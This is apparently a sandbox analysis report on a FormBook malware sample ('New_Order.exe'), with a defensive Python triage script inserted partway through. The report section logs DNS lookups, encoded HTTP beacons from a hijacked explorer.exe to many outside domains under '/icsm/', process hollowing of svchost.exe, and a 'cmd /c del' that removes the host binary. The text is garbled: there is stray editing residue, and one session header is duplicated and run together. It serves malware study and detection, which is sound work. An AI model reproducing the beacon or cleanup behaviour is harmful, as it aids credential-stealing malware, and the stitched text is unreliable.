May 12, 2021 06:10:57.885720015 CEST | 8.8.8.8 | 192.168.2.5 | 0xe9dd | No error (0) | www.voiceclubdubai.com | voiceclubdubai.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:10:57.885720015 CEST | 8.8.8.8 | 192.168.2.5 | 0xe9dd | No error (0) | voiceclubdubai.com | - | 91.148.168.141 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:03.124828100 CEST | 8.8.8.8 | 192.168.2.5 | 0x469b | Name error (3) | www.w-c727or.net | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:08.245578051 CEST | 8.8.8.8 | 192.168.2.5 | 0xbc63 | No error (0) | www.geacasolaro.com | - | 62.149.189.71 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | www.charmboutiques.com | charmbracelet-shop.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | charmbracelet-shop.myshopify.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | www.websitemax.co.uk | webforward.lcn.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | webforward.lcn.com | fwd3.hosts.co.uk | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk | - | 85.233.160.22 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk | - | 85.233.160.24 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk | - | 85.233.160.23 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:24.163995981 CEST | 8.8.8.8 | 192.168.2.5 | 0x73a4 | No error (0) | www.year-action.xyz | - | 150.95.255.38 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:29.892627001 CEST | 8.8.8.8 | 192.168.2.5 | 0x6819 | No error (0) | www.hdjakdhf.com | - | 8.210.40.49 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:35.520087004 CEST | 8.8.8.8 | 192.168.2.5 | 0xa038 | Name error (3) | www.kantan-sedori.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:40.639816046 CEST | 8.8.8.8 | 192.168.2.5 | 0x59cb | Name error (3) | www.shanghainternational.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:45.726883888 CEST | 8.8.8.8 | 192.168.2.5 | 0x88a8 | No error (0) | www.susanestuart.com | susanestuart.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:45.726883888 CEST | 8.8.8.8 | 192.168.2.5 | 0x88a8 | No error (0) | susanestuart.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:51.080497026 CEST | 8.8.8.8 | 192.168.2.5 | 0x80de | No error (0) | www.algaeflipflops.com | - | 64.190.62.111 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:56.303303003 CEST | 8.8.8.8 | 192.168.2.5 | 0x2892 | No error (0) | www.thelordnelsonwinthorpe.com | - | 94.136.40.51 | A (IP address) | IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.roastedorganic.com
                                                                      • www.voiceclubdubai.com
                                                                      • www.geacasolaro.com
                                                                      • www.charmboutiques.com
                                                                      • www.websitemax.co.uk
                                                                      • www.year-action.xyz
                                                                      • www.hdjakdhf.com
                                                                      • www.susanestuart.com

                                                                      HTTP Packets

                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      0 | 192.168.2.5 | 49716 | 75.2.115.196 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:10:52.620214939 CEST | 1331 | OUT | GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.roastedorganic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:52.777667046 CEST | 1332 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      1 | 192.168.2.5 | 49717 | 91.148.168.141 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:10:57.964154959 CEST | 1333 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1
                                                                      Host: www.voiceclubdubai.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:58.051840067 CEST | 1333 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:58 GMT
                                                                      Server: Apache
                                                                      Content-Length: 318
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.5 | 49718 | 62.149.189.71 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:08.305753946 CEST | 1334 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1
                                                                      Host: www.geacasolaro.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:08.363512993 CEST | 1335 | IN | HTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:08 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 253
                                                                      Connection: close
                                                                      X-Varnish: 824312071
                                                                      Retry-After: 5
                                                                      Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      3 | 192.168.2.5 | 49719 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:13.482528925 CEST | 1336 | OUT | GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.charmboutiques.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:13.647634983 CEST | 1337 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:11:13 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 163
                                                                      X-Sorting-Hat-ShopId: 46720286884
                                                                      X-Dc: gcp-us-central1
                                                                      X-Request-ID: 8ba024b4-24d2-42c4-a108-db837ba28889
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 0a005e9cec00004a5bb7b08000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 64e0cd417cd24a5b-FRA
                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.5 | 49720 | 85.233.160.22 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:18.796605110 CEST | 1343 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1
                                                                      Host: www.websitemax.co.uk
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:18.849797010 CEST | 1344 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 12 May 2021 04:11:18 GMT
                                                                      Server: Apache
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=iso-8859-1
</gr_replreplace>
<gr_replace lines="2486-2489" cat="reformat" orig="Session IDSource IPSource PortDestination IPDestination PortProcess">
                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      5 | 192.168.2.5 | 49724 | 150.95.255.38 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:24.480335951 CEST | 2828 | OUT | GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Data Ascii: 1e9<!DOCTYPE html><html><head><title>websitemax.co.uk</title><style type="text/css">body, html{margin: 0; padding: 0; height: 100%; overflow: hidden;}#content{position:absolute; left: 0; right: 0; bottom: 0; top: 0px;}</style><meta name="robots" content="noindex, nofollow"></head><body><div id="content"><iframe width="100%" height="100%" frameborder="0" src="https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk"></iframe></div></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.549724150.95.255.3880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:24.480335951 CEST2828OUTGET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.year-action.xyz
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:24.793498039 CEST | 3343 | IN | HTTP/1.1 302 Found
                                                                      Date: Wed, 12 May 2021 04:11:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                      Location: http://dfltweb1.onamae.com
                                                                      Content-Length: 210
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      6 | 192.168.2.5 | 49725 | 8.210.40.49 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:30.171286106 CEST | 5182 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1
                                                                      Host: www.hdjakdhf.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:30.448025942 CEST | 5182 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Wed, 12 May 2021 04:11:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      7 | 192.168.2.5 | 49727 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      May 12, 2021 06:11:45.772072077 CEST | 5217 | OUT | GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.susanestuart.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:45.909532070 CEST | 5217 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:06:09:42
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\New_Order.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x400000
                                                                      File size:344003 bytes
                                                                      MD5 hash:74E4EB9AFBF8F9C9B285A46CED831979
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:06:09:43
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x180000
                                                                      File size:44520 bytes
                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:09:48
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:01
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                      Imagebase:0x1260000
                                                                      File size:147456 bytes
                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\SysWOW64\svchost.exe'
                                                                      Imagebase:0x290000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
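
Taken together, the process records above show the pattern a responder should recognise: a process whose on-disk image is svchost.exe but whose command line names New_Order.exe (the hollowed host), svchost.exe started without the "-k <group>" argument that services.exe normally passes, Yara hits for FormBook in memory regions of that process, and a cmd.exe "/c del" aimed at the host binary under SysWOW64. The script below is an added triage example, not part of this report or of Joe Sandbox: it re-encodes a few of the records above as constructed input and applies those checks mechanically. It assumes (this is not documented on the page) that a Yara "Source" dump name follows the layout <process index>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp with <protection> a Win32 PAGE_* constant, and that "-k" absent from an svchost.exe command line is a sufficient anomaly indicator for a first pass.

```python
"""Triage checks over sandbox per-process records (added example, not report code)."""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Win32 memory protection constants; 0x40 in a dump name means the Yara hit was in RWX memory.
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Assumed dump-name layout (not documented on the page): idx.stage.dumpid.base.prot.type.sdmp
DUMP_RE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
                     r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$")


@dataclass
class ProcessRecord:
    path: str
    commandline: str
    yara_sources: list = field(default_factory=list)


# Constructed input: values copied from the process records in this report.
RECORDS = [
    ProcessRecord("C:\\Windows\\SysWOW64\\svchost.exe",
                  "'C:\\Users\\user\\Desktop\\New_Order.exe'",
                  ["00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp",
                   "00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp"]),
    ProcessRecord("C:\\Windows\\explorer.exe", ""),
    ProcessRecord("C:\\Windows\\SysWOW64\\wscript.exe", "C:\\Windows\\SysWOW64\\wscript.exe",
                  ["00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp"]),
    ProcessRecord("C:\\Windows\\SysWOW64\\cmd.exe", "/c del 'C:\\Windows\\SysWOW64\\svchost.exe'"),
    ProcessRecord("C:\\Windows\\System32\\conhost.exe",
                  "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
]


def first_token(cmdline: str) -> str:
    """Return argv[0] of a Windows command line, honouring single or double quotes."""
    s = cmdline.strip()
    if not s:
        return ""
    if s[0] in "\"'":
        end = s.find(s[0], 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0]


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_hollowing(rec: ProcessRecord) -> bool:
    """Image on disk differs from the executable named on the command line."""
    argv0 = first_token(rec.commandline)
    if not argv0.lower().endswith(".exe"):
        return False  # '/c ...' style lines carry no argv[0]; nothing to compare
    return image_name(argv0) != image_name(rec.path)


def check_svchost_no_group(rec: ProcessRecord) -> bool:
    """services.exe launches svchost.exe as 'svchost.exe -k <group>'; anything else is odd."""
    return image_name(rec.path) == "svchost.exe" and " -k " not in f" {rec.commandline} "


def check_system_binary_deletion(rec: ProcessRecord) -> bool:
    """cmd.exe /c del of a file under System32 or SysWOW64 (cleanup of a hollowed host)."""
    if image_name(rec.path) != "cmd.exe":
        return False
    m = re.search(r"\bdel\b\s+[\"']?([^\"']+)", rec.commandline, re.IGNORECASE)
    return bool(m) and m.group(1).lower().startswith(SYSTEM_DIRS)


def decode_dump_source(src: str) -> dict:
    """Split a Yara 'Source' dump name into process index, base address and page protection."""
    m = DUMP_RE.match(src)
    if not m:
        raise ValueError(f"unrecognised dump name: {src}")
    prot = int(m["prot"], 16)
    return {"process": int(m["pid"], 16), "base": int(m["base"], 16),
            "protection": PAGE_PROT.get(prot, hex(prot)),
            "executable": bool(prot & 0xF0)}  # any PAGE_EXECUTE_* flag


def triage(records) -> list:
    findings = []
    for rec in records:
        name = image_name(rec.path)
        if check_hollowing(rec):
            findings.append((name, "image/commandline mismatch (possible process hollowing)"))
        if check_svchost_no_group(rec):
            findings.append((name, "svchost.exe started without '-k <group>'"))
        if check_system_binary_deletion(rec):
            findings.append((name, "deletes a binary under the Windows system directory"))
        for src in rec.yara_sources:
            d = decode_dump_source(src)
            if d["protection"] == "PAGE_EXECUTE_READWRITE":
                findings.append((name, f"Yara hit in RWX region at {d['base']:#x}"))
    return findings


if __name__ == "__main__":
    for proc, why in triage(RECORDS):
        print(f"{proc}: {why}")
```

Run against the five constructed records it reports the svchost.exe host three ways (hollowing mismatch, missing "-k", and two RWX regions carrying the FormBook payload, one of them the 0x400000 image base) and flags the cmd.exe deletion; the wscript.exe hit in a PAGE_READWRITE region is decoded but not raised as RWX. On a live host the same checks apply to Sysmon event ID 1 records, which carry both Image and CommandLine.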

                                                                      Disassembly

                                                                      Code Analysis
